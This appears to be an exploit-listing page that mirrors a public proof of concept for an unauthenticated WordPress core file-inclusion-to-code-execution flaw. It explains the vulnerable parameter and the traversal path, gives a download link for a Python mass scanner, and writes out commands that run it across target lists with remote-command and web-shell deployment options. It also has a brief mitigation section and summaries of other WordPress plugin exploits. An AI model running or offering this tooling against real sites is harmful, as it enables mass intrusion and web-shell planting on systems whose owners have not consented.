CVE-2026-87902 — WordPress Core get_page_template() Unauthenticated LFI → RCE (PEAR chain)
October 2, 2026 · 79 views
WordPress core 4.7.0–7.1.1: pagename from POST used in get_page_template() without validate_file(); page-templates/ traversal + PEAR gadget → RCE. GHSA-7hp8-65ch-5whp, CVSS 4.0 9.8, CWE-22. Fixed 7.1.2+ (backports 6.8.10, 7.0.6). Python mass scanner: --check, --rce, --shell. Upstream: MRdark-ops/CVE-2026-87902 (HackfutSecRoot).
Description
Overview
CVE-2026-87902 — WordPress core — unauthenticated local file inclusion in wp-includes/template.php:get_page_template() that can escalate to remote code execution via a PEAR gadget chain (GHSA-7hp8-65ch-5whp, CVSS 4.0 9.8, CWE-22).
| | |
|---|---|
| Affected | WordPress 4.7.0 → 7.1.1 |
| Fixed | ≥ 7.1.2 (also 6.8.10, 7.0.6 backports) |
| Auth | None for LFI trigger |
| Vector | pagename query var (e.g. POST) → page-templates/ traversal without validate_file() |
Public tooling mirrored on PoCbit from community research. Upstream repository: MRdark-ops/CVE-2026-87902 (author HackfutSecRoot). Also referenced as HackfutSecRoot/CVE-2026-87902 in upstream README.
PoC page: https://pocbit.org/pocs/cve-2026-87902
CVE.org: CVE-2026-87902
Attack chain (summary)
- Anonymous POST with
page_id+ craftedpagenameunder page-templates/ traversal. - LFI confirmed (e.g. OPML oracle /
wp-links-opml.php). - Optional PEAR config-create gadget → shell / file manager deployment.
Practical exploitation may require theme layout preconditions (real page-* path under active theme) and PEAR/register_argc_argv environment factors—treat mass scanner output as signals, not guaranteed compromise.
Bundled tool (Python 3.8+)
Download cve-2026-87902.py — extracts the XWP_RCE/ tree from upstream.
python cve-2026-87902.py
cd XWP_RCE
python main.py -u https://target.example --check
python main.py -l targets.txt --check --threads 20
python main.py -l targets.txt --rce --shell --threads 10
python main.py -u https://target.example --rce --command "id"
Outputs (per upstream): results.txt, vulnerable.txt, rce.txt, shells.txt.
Mitigation
- Upgrade WordPress to 7.1.2+ or applicable backport for your branch.
- WAF: block
pagenamecontaining../or encoded traversal. register_argc_argv = Offinphp.ini(reduces PEAR chain reach); remove unused pearcmd.php.
See WordPress security checklist (2026) and how to prioritize critical CVEs.
Legal and ethical use
Authorized security testing only.
References
Related PoCs
Same platform, vendor, or tags — explore more write-ups on Pocbit.
- WordPressCVE-2026-96349critical
CVE-2026-96349 — WordPress SiteSkite ≤2.1.8 API-Key Autologin + MCP eval() RCE Chain
SiteSkite WordPress plugin ≤2.1.8: long-lived API key acts as unauthenticated admin bearer via ?token= autologin; REST/admin-ajax MCP abilities run siteskite_execute_php (eval) and file write. CVSS 10.0 Critical (CWE-94). Fixed in 2.2.0. Python PoC: check (readme ≤2.1.8), exploit with API key, mass hits/exploited, --lab. Marker POCBIT-96349-OK.
- WordPressCVE-2026-92966critical
CVE-2026-92966 — WordPress LatePoint ≤5.7.0 Stored Shortcode Execution (Customer Cabinet)
LatePoint appointment booking ≤5.7.0: unauthenticated guest booking stores [shortcode] in customer first/last name (sanitize_text_field keeps brackets); Customer Cabinet block renders welcome line then the_content do_shortcode runs twice → arbitrary shortcode execution. CVSS 9.1 Critical (CWE-94). Fixed in 5.7.1. No API key. Python PoC: check, mass exploit, --lab, optional POCBIT_EXEC_SHORTCODE. Marker POCBIT-92966-OK.
- WordPressCVE-2026-85984critical
CVE-2026-85984 — WordPress miniOrange OTP Unauthenticated Admin Bypass
Unauthenticated authentication bypass (CWE-287) in miniOrange OTP Login, Verification and SMS Notifications ≤ 5.5.5 via wp-login.php POST mo_wp_login_intent=otp with empty password — mo_by_pass_login() skip_pass_fallback skips password check when Admin OTP Bypass and related OTP login options are enabled. CVSS 3.1 9.8 Critical. Fixed in 5.5.6+. PoC: plugin scan, optional user enum, check/exploit modes.
- WordPressCVE-2026-14281critical
CVE-2026-14281 — WAWP WordPress Unauthenticated Privilege Escalation (≤ 4.8.6)
Unauthenticated administrator via public WAWP REST signup: unsanitized wawp_custom_fields writes wp_capabilities through update_user_meta. Automation Web Platform plugin ≤ 4.8.6 (CVSS 3.1 9.8 Critical).